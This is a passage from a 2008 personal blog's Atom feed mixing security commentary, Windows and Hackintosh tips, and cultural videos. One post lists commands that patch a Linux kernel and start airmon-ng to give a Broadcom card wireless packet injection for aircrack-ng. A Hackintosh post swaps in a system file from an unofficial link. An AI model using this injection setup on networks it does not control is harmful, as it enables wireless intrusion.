an analyst's console. The customer is left to do an investigation to validate the alert. Good MSSPs (including internal ones) use an alert as an indicator to start their own investigation, backed by the necessary actionable evidence to &lt;b&gt;make a decision&lt;/b&gt;. Then they call the customer to inform them that a problem is happening, not to ask the customer "is anything wrong?" The customer learns to trust the MSSP, because when the MSSP does call it means something.&lt;br /&gt;&lt;br /&gt;&lt;i&gt;CSO: If you are a retailer just coming to the realization that you need to adopt a system like Zale's, what are the first items you should be thinking about?&lt;br /&gt;&lt;br /&gt;Thomas: The first thing you need to do is &lt;b&gt;determine where your risk is&lt;/b&gt;. Is it the employee? Does the general public have access to your merchandise? Where is your shrink occurring and where will those precious dollars get the most benefit? The second thing you should do is go out and look at what your competitors are doing technologically to ensure security. Then you are able to build your system to meet the specific needs of your organization.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Again, Zale Corp. demonstrates where to begin.  You can determine risk by performing preliminary monitoring to &lt;b&gt;observe actual problems&lt;/b&gt; before implementing countermeasures.  Bruce Schneier calls this &lt;b&gt;monitor first&lt;/b&gt;.&lt;br /&gt;&lt;br /&gt;Great article Bill Brenner!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-2285089001667124145?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/2285089001667124145/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=2285089001667124145' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/2285089001667124145'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/2285089001667124145'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2008/12/physical-security-lessons.html' title='Physical Security Lessons'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_zPPJaS3LoQM/SVEB7nyBwzI/AAAAAAAAAgQ/c5u3ojGcvAU/s72-c/policeman+and+hacker.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-4771232885972192889</id><published>2008-11-19T13:25:00.001+08:00</published><updated>2008-11-19T13:28:47.817+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='News'/><title type='text'>DRI: Business Continuity Management Course</title><content type='html'>&lt;a style="" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_zPPJaS3LoQM/SSOedWXCauI/AAAAAAAAAf4/NUpApcZppEU/s1600-h/leftpic01x.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px; height: 98px;" src="http://1.bp.blogspot.com/_zPPJaS3LoQM/SSOedWXCauI/AAAAAAAAAf4/NUpApcZppEU/s200/leftpic01x.jpg" alt="" id="BLOGGER_PHOTO_ID_5270230216009214690" border="0" /&gt;&lt;/a&gt;On 17/11/08 - 18/11/08 I've attended the Basic Course of Business Continuity Management (BCM) conducted by DRI-Malaysia at &lt;a href="http://www.parkroyalhotels.com/"&gt;ParkRoyal Hotel&lt;/a&gt;, Kuala Lumpur.&lt;br /&gt;&lt;br /&gt;The course helps me understand how important the Disaster and Recovery Plan for the organization especially systems serves mission critical operations. I would say it will helps me a lot in designing and planning disaster and recovery strategy, process and implementation of it. At the end of the course, DRI show us a very nice movie clips that shows the whole scenario how BCM can be implemented on the organization. I like the part where one of the workers interviewed by the press. It tells me whenever disaster happen never ever talk to the press, just lets the responsible person for that do their job.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_zPPJaS3LoQM/SSOiyoV2qDI/AAAAAAAAAgA/72S-Ximz9-s/s1600-h/18112008882.png"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 200px; height: 150px;" src="http://2.bp.blogspot.com/_zPPJaS3LoQM/SSOiyoV2qDI/AAAAAAAAAgA/72S-Ximz9-s/s200/18112008882.png" alt="" id="BLOGGER_PHOTO_ID_5270234979659851826" border="0" /&gt;&lt;/a&gt;I diffidently suggest this course for you to attend. It promise you a better understand and overview of &lt;span style="font-weight: bold;"&gt;Business Continuity Plan&lt;/span&gt;&lt;span style="font-weight: bold;"&gt; which actually most organization need them.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a style="font-style: italic;" href="http://www.dri.org/open/About.aspx"&gt;"DRI &lt;/a&gt;&lt;span style="font-style: italic;"&gt;is the international organization of attorneys defending the interests of business and individuals in civil litigation. DRI provides numerous educational and informational resources to DRI members and offers many opportunities for liaison among defense trial lawyers, Corporate America, and state and local defense organizations. DRI also has an international presence, seeking to enhance understanding of the law among members of the defense community who have reason to be concerned with the expanding globalization of litigation defense."&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-4771232885972192889?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/4771232885972192889/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=4771232885972192889' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/4771232885972192889'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/4771232885972192889'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2008/11/dri-business-continuity-management.html' title='DRI: Business Continuity Management Course'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_zPPJaS3LoQM/SSOedWXCauI/AAAAAAAAAf4/NUpApcZppEU/s72-c/leftpic01x.jpg' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-1340687283850751794</id><published>2008-11-14T10:01:00.001+08:00</published><updated>2008-11-14T10:02:55.773+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='uDc'/><title type='text'>Changing your Microsoft Office Key</title><content type='html'>1. Close all Microsoft Office programs.&lt;br /&gt;&lt;br /&gt;2. Click on Start button, then click on Run.&lt;br /&gt;&lt;br /&gt;3. Type “regedit” (without quotes) in the Run text box, and click OK or press Enter.&lt;br /&gt;&lt;br /&gt;4. Locate and then click the following subkey:&lt;br /&gt;&lt;br /&gt;      HKEY_LOCAL_MACHINE \Software\Microsoft\Office\12.0\Registration&lt;br /&gt;&lt;br /&gt;      Inside, you will find another subkey that resembles the following subkey:&lt;br /&gt;&lt;br /&gt;      HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\12.0\Registration\{30120000-0011-0000-0000-0000000FF1CE}&lt;br /&gt;&lt;br /&gt;5. Optional: Backup this registry branch by exporting the Registration subkey to a file, just in case the new product key does not work and you have to restore back the old product key. To export the registry, right click on the Registration subkey and click on Export, and follow the on-screen prompt to enter a file name for the registry file and choose a location to store it.&lt;br /&gt;&lt;br /&gt;6. Under the Registration subkey, there may be several Globally Unique Identifiers (GUID) subkey that contain a combination of alphanumeric characters. Each GUID is specific to a program that is installed on your computer.&lt;br /&gt;&lt;br /&gt;If you find additional subkeys that reference Microsoft 12.0 registration, then click and open each GUID subkey to view and identify the Office product version by the ProductName registry entry in the right pane. For example:&lt;br /&gt;&lt;br /&gt;ProductName=Microsoft Office Professional Plus 2007&lt;br /&gt;&lt;br /&gt;7. After you find the GUID subkey that contains your Office product or program which you want to remove the existing product license key or registration details, delete the following registry entries by right clicking on the registry entry in the GUID subkey, click Delete, and then click Yes:&lt;br /&gt;&lt;br /&gt;      • DigitalProductID&lt;br /&gt;      • ProductID&lt;br /&gt;&lt;br /&gt;8. Exit Registry Editor.&lt;br /&gt;&lt;br /&gt;9. Run or open an Office application program, such as Microsoft Word or Excel or Outlook. Office 2007 will prompt you to enter a new 25-character product key.&lt;br /&gt;&lt;br /&gt;10. Type in the valid and genuine product key, and then click OK.&lt;br /&gt;&lt;br /&gt;11. Then when prompted to choose your preferred type of Microsoft Office 2007 installation, press on “Install Now”.&lt;br /&gt;&lt;br /&gt;12. Microsoft Office 2007 will be updated with new product CD key or volume license key, and ready for activation (if it’s a non-VLK serial) or use.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-1340687283850751794?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/1340687283850751794/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=1340687283850751794' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/1340687283850751794'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/1340687283850751794'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2008/11/changing-your-microsoft-office-key.html' title='Changing your Microsoft Office Key'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-6768324015853803059</id><published>2008-11-13T23:28:00.000+08:00</published><updated>2008-11-14T09:57:16.841+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='uDc'/><title type='text'>b43 injection on ubuntu with kernel-2.6.25</title><content type='html'>apt-get install build-essential bin86 kernel-package libqt3-headers libqt3-mt-dev wget libncurses5 libncurses5-dev&lt;br /&gt;&lt;br /&gt;cd /usr/src&lt;br /&gt;wget http://www.kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.tar.bz2&lt;br /&gt;tar -xjf linux-2.6.25.tar.bz2&lt;br /&gt;cd /usr/src/linux-2.6.25&lt;br /&gt;wget http://patches.aircrack-ng.org/b43-injection-2.6.25-wl.patch&lt;br /&gt;wget http://www.latinsud.com/bcm/mac80211_2.6.24.4_frag.patch&lt;br /&gt;patch -p1 &lt; b43-injection-2.6.25-wl.patch&lt;br /&gt;patch -p1 &lt; mac80211_2.6.24.4_frag.patch&lt;br /&gt;&lt;br /&gt;cp /boot/config-`uname -r` .config&lt;br /&gt;make oldconfig&lt;br /&gt;make menuconfig&lt;br /&gt;make-kpkg --initrd --revision=shaol1nint kernel_image kernel_headers modules_image&lt;br /&gt;install .deb files&lt;br /&gt;dpkg -i filename&lt;br /&gt;and reboot&lt;br /&gt;&lt;br /&gt;wget http://bu3sch.de/b43/fwcutter/b43-fwcutter-011.tar.bz2&lt;br /&gt;tar xjf b43-fwcutter-011.tar.bz2&lt;br /&gt;cd b43-fwcutter-011&lt;br /&gt;make&lt;br /&gt;cd ..&lt;br /&gt;&lt;br /&gt;export FIRMWARE_INSTALL_DIR="/lib/firmware"&lt;br /&gt;wget http://mirror2.openwrt.org/sources/broadcom-wl-4.150.10.5.tar.bz2&lt;br /&gt;tar xjf broadcom-wl-4.150.10.5.tar.bz2&lt;br /&gt;cd broadcom-wl-4.150.10.5/driver&lt;br /&gt;sudo ../../b43-fwcutter-011/b43-fwcutter -w /lib/firmware wl_apsta_mimo.o&lt;br /&gt;&lt;br /&gt;sudo apt-get install libsqlite3-0 libssl-dev&lt;br /&gt;&lt;br /&gt;apt-get install libnl-dev&lt;br /&gt;sudo mkdir iw&lt;br /&gt;cd iw&lt;br /&gt;sudo wget http://dl.aircrack-ng.org/iw.tar.bz2&lt;br /&gt;sudo tar xjf iw.tar.bz2&lt;br /&gt;sudo make&lt;br /&gt;sudo make install&lt;br /&gt;&lt;br /&gt;airmon-ng start wlan0&lt;br /&gt;&lt;br /&gt;vi /etc/modprobe.d/options&lt;br /&gt;add new line "options b43 nohwcrypt=1"&lt;br /&gt;This ensures that the encryption on wlan0 doesn't interfere with monitoring. This should be only enabled when aircracking with mon0, as it increases the softmac overhead.  Remove it from your options list when not using aircrack for a longer time.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-6768324015853803059?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/6768324015853803059/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=6768324015853803059' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/6768324015853803059'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/6768324015853803059'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2008/11/b43-injection-on-ubuntu-with-kernel.html' title='b43 injection on ubuntu with kernel-2.6.25'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-422397126609393842</id><published>2008-10-06T23:02:00.003+08:00</published><updated>2008-10-06T23:13:23.585+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='OSX86'/><title type='text'>PowerManagement - Taskbar Battery Icon</title><content type='html'>shaolinint@Shaolin-Integers-Hackintosh-Pro:$ pwd&lt;br /&gt;/Users/shaolinint/backup&lt;br /&gt;&lt;br /&gt;shaolinint@Shaolin-Integers-Hackintosh-Pro:$ sudo mv /System/Library/SystemConfiguration/PowerManagement.bundle .&lt;br /&gt;&lt;br /&gt;You will need to download this &lt;a href="http://osx86heb1.googlepages.com/PowerManagement10.5.3.zip"&gt;files&lt;/a&gt; and install it on your machine.&lt;br /&gt;Then, reboot and it should work.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-422397126609393842?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/422397126609393842/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=422397126609393842' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/422397126609393842'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/422397126609393842'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2008/10/powermanagement-taskbar-battery-icon.html' title='PowerManagement - Taskbar Battery Icon'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-3374033098962555243</id><published>2008-09-15T22:55:00.004+08:00</published><updated>2008-09-15T23:04:23.140+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='News'/><title type='text'>Lord of Ramadhan</title><content type='html'>&lt;object width="425" height="344"&gt;&lt;param name="movie" value="http://www.youtube.com/v/0BtNv2eRwRc&amp;hl=en&amp;fs=1&amp;"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/0BtNv2eRwRc&amp;autoplay=1&amp;hl=en&amp;fs=1" type="application/x-shockwave-flash" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-3374033098962555243?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/3374033098962555243/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=3374033098962555243' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/3374033098962555243'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/3374033098962555243'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2008/09/lord-of-ramadhan.html' title='Lord of Ramadhan'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-219062945243552751</id><published>2008-08-11T23:25:00.000+08:00</published><updated>2008-08-11T23:26:47.998+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='News'/><title type='text'>Permintaan Terakhir (ntah betul ntah tidak)</title><content type='html'>&lt;object width="425" height="344"&gt;&lt;param name="movie" value="http://www.youtube.com/v/wOVWv8ME3AY&amp;hl=en&amp;fs=1"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/wOVWv8ME3AY&amp;hl=en&amp;fs=1" type="application/x-shockwave-flash" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-219062945243552751?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/219062945243552751/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=219062945243552751' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/219062945243552751'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/219062945243552751'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2008/08/permintaan-terakhir-ntah-betul-ntah.html' title='Permintaan Terakhir (ntah betul ntah tidak)'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-2666125604988091410</id><published>2008-07-24T21:56:00.003+08:00</published><updated>2008-07-24T22:03:24.532+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='uDc'/><category scheme='http://www.blogger.com/atom/ns#' term='Entertainment'/><title type='text'>The Beauty of Bajau - Proud of My Culture</title><content type='html'>The Bajau, (also written as Badjao, Badjaw or Badjau) are an indigenous ethnic group the Philippines and in parts of Sabah, Brunei and Sarawak. Although the majority of the Bajau live in the Philippines, due to unrest in their native Sulu Archipelago, in the southern part of the country, many Bajau had migrated to neighbouring Malaysia over the course of 40 years, where currently they are the second largest ethnic group in the state of Sabah, making up 13.4%[1] of the total population. They were sometimes referred to as the Sea Gypsies, although the term has been used to encompass a number of non-related ethnic groups with similar traditional lifestyles, such as the Samadilaut and Jama Mapun peoples of the Southern Philippines. The Bajau of Indonesia live primarily on the islands and in the coastal districts of Sulawesi. The modern outward spread of the Bajau from older inhabited areas seems to have been associated with the development of sea trade in trepang.&lt;br /&gt;&lt;br /&gt;&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/CneHhsCr4IU&amp;amp;hl=en&amp;amp;fs=1"&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;embed src="http://www.youtube.com/v/CneHhsCr4IU&amp;amp;hl=en&amp;amp;fs=1" type="application/x-shockwave-flash" allowfullscreen="true" height="344" width="425"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;&lt;object width="425" height="344"&gt;&lt;param name="movie" value="http://www.youtube.com/v/cIboUdQSjI8&amp;hl=en&amp;fs=1"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/cIboUdQSjI8&amp;hl=en&amp;fs=1" type="application/x-shockwave-flash" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-2666125604988091410?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/2666125604988091410/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=2666125604988091410' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/2666125604988091410'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/2666125604988091410'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2008/07/beauty-of-bajau-proud-of-my-culture.html' title='The Beauty of Bajau - Proud of My Culture'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-6413822690659596243</id><published>2008-07-24T12:39:00.003+08:00</published><updated>2008-07-24T22:33:35.850+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Security'/><category scheme='http://www.blogger.com/atom/ns#' term='News'/><title type='text'>VSAT Hacking</title><content type='html'>This was presented at HiTB 2006. I just wanted to put it on my blog ;)&lt;br /&gt;&lt;br /&gt;&lt;embed id="VideoPlayback" style="width: 400px; height: 326px;" allowfullscreen="true" src="http://video.google.com/googleplayer.swf?docid=-5688983951037724249&amp;amp;hl=en&amp;amp;fs=true" type="application/x-shockwave-flash"&gt;&lt;/embed&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-6413822690659596243?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/6413822690659596243/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=6413822690659596243' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/6413822690659596243'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/6413822690659596243'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2008/07/vsat-hacking.html' title='VSAT Hacking'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-4406111055897356526</id><published>2008-07-07T11:54:00.011+08:00</published><updated>2008-07-07T14:35:27.757+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Penglipur Lara'/><category scheme='http://www.blogger.com/atom/ns#' term='PeriBajau'/><title type='text'>Poco-Poco Baaahhhh</title><content type='html'>The Poco-Poco is a popular line dance which originally comes from the Minahasa people in Sulawesi. The steps are said to originate from farming activities such as picking cloves, planting rice, hoeing the fields and peeling coconut fibre. &lt;br /&gt;&lt;br /&gt;The Poco-poco dance become very popular throughout Indonesia a few years ago and has been integrated into aerobic classes and at dance schools throughout Indonesia. It has become one of many dances that young and old want to learn. Many organisations hold Poco-poco dance competitions and it is also a popular dance for celebrations such as weddings, birthdays and Independence Day.&lt;br /&gt;&lt;br /&gt;&lt;object width="425" height="344"&gt;&lt;param name="movie" value="http://www.youtube.com/v/uf0Y5JKQHQk&amp;hl=en"&gt;&lt;/param&gt;&lt;param name="wmode" value="transparent"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/uf0Y5JKQHQk&amp;hl=en" type="application/x-shockwave-flash" wmode="transparent" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Now, let's watch the professional dancers ;)&lt;br /&gt;&lt;object height="344" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/JOkWgLxo4Pc&amp;amp;hl=en&amp;amp;fs=1"&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;embed src="http://www.youtube.com/v/JOkWgLxo4Pc&amp;amp;hl=en&amp;amp;fs=1" type="application/x-shockwave-flash" allowfullscreen="true" height="344" width="425"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Next, you'll need to learn Poco-Poco dance: &lt;br /&gt;&lt;object width="425" height="344"&gt;&lt;param name="movie" value="http://www.youtube.com/v/kYejJp0aEos&amp;hl=en&amp;fs=1"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/kYejJp0aEos&amp;hl=en&amp;fs=1" type="application/x-shockwave-flash" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;Now, you can teach your mom and dad to join you for poco poco dance.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-4406111055897356526?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/4406111055897356526/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=4406111055897356526' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/4406111055897356526'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/4406111055897356526'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2008/07/poco-poco-baaahhhh.html' title='Poco-Poco Baaahhhh'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-2619726463476181021</id><published>2008-07-07T09:30:00.000+08:00</published><updated>2008-11-07T10:00:03.864+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='News'/><category scheme='http://www.blogger.com/atom/ns#' term='uDc'/><title type='text'>Three Days in Berlin</title><content type='html'>&lt;b&gt;Berlin&lt;/b&gt; is the &lt;a href="http://en.wikipedia.org/wiki/Capital" title="Capital"&gt;capital&lt;/a&gt; city and one of sixteen &lt;a href="http://en.wikipedia.org/wiki/States_of_Germany" title="States of Germany"&gt;states&lt;/a&gt; of &lt;a href="http://en.wikipedia.org/wiki/Germany" title="Germany"&gt;Germany&lt;/a&gt;. With a population of 3.4 million in its city limits, Berlin is the 